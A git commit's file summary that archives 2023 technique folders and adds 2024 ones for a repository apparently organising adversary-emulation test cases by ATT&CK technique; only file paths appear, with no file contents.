 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.001_taskmgr_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.006_dcsync_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1070.001_cleareventlog_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1218.005_mshta_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1218.011_proxy_exe_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1489_netstop_bulk_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1550.003_passtheticket_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1574.001_dll_searchorderhijack_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1018_nltest_dclist_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1046_networkscan_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1087.002_adfind_bulk_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1087.002_ldap_users_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1087.002_net_domainadmins_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1087.002_net_user_groups_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1135_netview_shares_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1482_nltest_all_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Execution/T1106_exe_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Execution/T1204.002_macro_hta_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Execution/T1204.002_macro_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Exfiltration/T1048.003_httpexfil_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Impact/T1021.002_remote_ransomware_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Impact/T1486_ransomware_v3.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1078_suspicious_login_v3.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1110.003_externalspray_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1566.002_spl_iso_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1621_mfa_spam_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/LateralMovement/T1021.001_rdp_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/LateralMovement/T1021.002_smbc2_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/LateralMovement/T1021.003_scheduledtask_v2.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/LateralMovement/T1021.003_wmipcc_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/LateralMovement/T1057_processdiscovery_remote_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/LateralMovement/T1570_execopy_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Persistence/T1053.005_schtask_v7.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Persistence/T1136.001_newlocaladmin_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Persistence/T1543.003_newservice_reg_v1.yml (100%)
 rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Persistence/T1547.001_runkey_v3.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/NOTEBOOK.md (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/REQUIREMENTS.md (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/h-index-2023-v1.2-summary.csv (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/h-index-2023-v1.2.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/navigator.json (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Collection/T1056.001_keylog_v2.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Collection/T1560.001_7zip_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CommandandControl/T1071.001_httpc2_v3.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CommandandControl/T1071.001_httpsc2_v3.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CommandandControl/T1105_tooldownload_v2.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CommandandControl/T1219_remote_assist_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1003.001_creddumpmemory_v3.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1003.001_procdump_v2.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1003.001_processhacker_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1003.002_hashdump_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/DefenseEvasion/T1140_certutil_decode_v2.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/DefenseEvasion/T1218.005_mshta_v2.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1046_networkscan_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1057_processdiscovery_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1087.001_net_localgroup_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1087.002_adfind_bulk_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1087.002_net_domainadmins_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1087.002_setspn_collection_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1135_netview_shares_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1482_nltest_all_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1518.001_securitydiscovery_v3.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Execution/T1106_exe_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Execution/T1204.002_macro_hta_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Execution/T1204.002_macro_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Exfiltration/T1041_httpc2exfil_v2.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Impact/T1021.002_remote_ransomware_v2.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Impact/T1486_ransomware_v3.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/InitialAccess/T1566.001_encarchive_macro_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/InitialAccess/T1566.001_zipped_js_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/InitialAccess/T1621_mfa_spam_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/LateralMovement/T1021.001_rdp_v2.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/LateralMovement/T1021.003_wmipcc_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Persistence/T1053.005_schtask_v7.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Persistence/T1136.001_newlocaladmin_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Persistence/T1543.003_newservice_reg_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Persistence/T1547.001_runonce_v2.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Persistence/T1547.001_startupfolder_v1.yml (100%)
 rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Persistence/T1564.002_hide_user_logon_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/NOTEBOOK.md (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/REQUIREMENTS.md (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/navigator.json (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/rh-index-2023-v1.2-summary.csv (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/rh-index-2023-v1.2.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Collection/T1560.001_7zip_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CommandandControl/T1071.001_httpc2_v3.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CommandandControl/T1071.001_httpsc2_v3.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CommandandControl/T1105_tooldownload_v2.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CommandandControl/T1219_remote_assist_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1003.001_procdump_v2.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1003.001_processhacker_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1003.002_hashdump_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1003.006_dcsync_v2.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1558.003_kerberoast_v3.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/DefenseEvasion/T1218.005_mshta_v2.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1018_nltest_dclist_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1046_networkscan_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1049_sessiongopher_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1082_systeminfo_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1087.001_net_localgroup_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1087.002_ad_explorer_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1087.002_net_domainadmins_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1087.002_setspn_collection_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1135_netview_shares_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1482_nltest_all_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Execution/T1059.005_vbs_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Execution/T1106_exe_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Execution/T1204.002_macro_hta_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Execution/T1204.002_macro_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Impact/T1021.002_remote_ransomware_v2.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Impact/T1486_ransomware_v3.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1078_suspicious_login_v3.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1566.002_zipped_vbs_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1621_mfa_spam_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/LateralMovement/T1021.001_rdp_v2.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/LateralMovement/T1021.003_wmipcc_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Persistence/T1053.005_schtask_v7.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Persistence/T1098.005_aadjoin_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Persistence/T1136.001_newlocaladmin_v1.yml (100%)
 rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Persistence/T1543.003_newservice_reg_v1.yml (100%)
 create mode 100644 fs-index-2024/CHANGELOG.md
 create mode 100644 fs-index-2024/REQUIREMENTS.md
 create mode 100644 fs-index-2024/fs-index-2024-v1.0-layer.json
 create mode 100644 fs-index-2024/fs-index-2024-v1.0-notebook.md
 create mode 100644 fs-index-2024/fs-index-2024-v1.0-summary.csv
 create mode 100644 fs-index-2024/fs-index-2024-v1.0.yml
 create mode 100644 fs-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
 create mode 100644 fs-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
 create mode 100644 fs-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
 create mode 100644 fs-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
 create mode 100644 fs-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
 create mode 100644 fs-index-2024/techniques/CommandandControl/43ab96a9-b2c0-442a-b8e4-18e172a1a2ce.yml
 create mode 100644 fs-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
 create mode 100644 fs-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
 create mode 100644 fs-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
 create mode 100644 fs-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
 create mode 100644 fs-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
 create mode 100644 fs-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
 create mode 100644 fs-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
 create mode 100644 fs-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
 create mode 100644 fs-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
 create mode 100644 fs-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
 create mode 100644 fs-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
 create mode 100644 fs-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
 create mode 100644 fs-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
 create mode 100644 fs-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
 create mode 100644 fs-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
 create mode 100644 fs-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
 create mode 100644 fs-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml
 create mode 100644 fs-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml
 create mode 100644 fs-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
 create mode 100644 fs-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
 create mode 100644 fs-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml
 create mode 100644 fs-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
 create mode 100644 fs-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
 create mode 100644 fs-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
 create mode 100644 fs-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
 create mode 100644 fs-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
 create mode 100644 fs-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
 create mode 100644 fs-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
 create mode 100644 fs-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
 create mode 100644 fs-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml
 create mode 100644 fs-index-2024/techniques/InitialAccess/44fd7250-e613-441f-9cb6-5b98c2d71338.yml
 create mode 100644 fs-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml
 create mode 100644 fs-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml
 create mode 100644 fs-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
 create mode 100644 fs-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
 create mode 100644 fs-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
 create mode 100644 fs-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
 create mode 100644 fs-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
 create mode 100644 fs-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml
 create mode 100644 fs-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
 create mode 100644 fs-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
 create mode 100644 fs-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
 create mode 100644 fs-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
 create mode 100644 fs-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
 create mode 100644 h-index-2024/CHANGELOG.md
 create mode 100644 h-index-2024/REQUIREMENTS.md
 create mode 100644 h-index-2024/h-index-2024-v1.0-layer.json
 create mode 100644 h-index-2024/h-index-2024-v1.0-notebook.md
 create mode 100644 h-index-2024/h-index-2024-v1.0-summary.csv
 create mode 100644 h-index-2024/h-index-2024-v1.0.yml
 create mode 100644 h-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
 create mode 100644 h-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
 create mode 100644 h-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
 create mode 100644 h-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
 create mode 100644 h-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
 create mode 100644 h-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
 create mode 100644 h-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
 create mode 100644 h-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
 create mode 100644 h-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
 create mode 100644 h-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
 create mode 100644 h-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
 create mode 100644 h-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
 create mode 100644 h-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
 create mode 100644 h-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
 create mode 100644 h-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
 create mode 100644 h-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
 create mode 100644 h-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
 create mode 100644 h-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
 create mode 100644 h-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
 create mode 100644 h-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
 create mode 100644 h-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
 create mode 100644 h-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml
 create mode 100644 h-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml
 create mode 100644 h-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
 create mode 100644 h-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
 create mode 100644 h-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
 create mode 100644 h-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
 create mode 100644 h-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml
 create mode 100644 h-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
 create mode 100644 h-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
 create mode 100644 h-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
 create mode 100644 h-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
 create mode 100644 h-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
 create mode 100644 h-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
 create mode 100644 h-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml
 create mode 100644 h-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml
 create mode 100644 h-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml
 create mode 100644 h-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml
 create mode 100644 h-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
 create mode 100644 h-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
 create mode 100644 h-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
 create mode 100644 h-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
 create mode 100644 h-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
 create mode 100644 h-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml
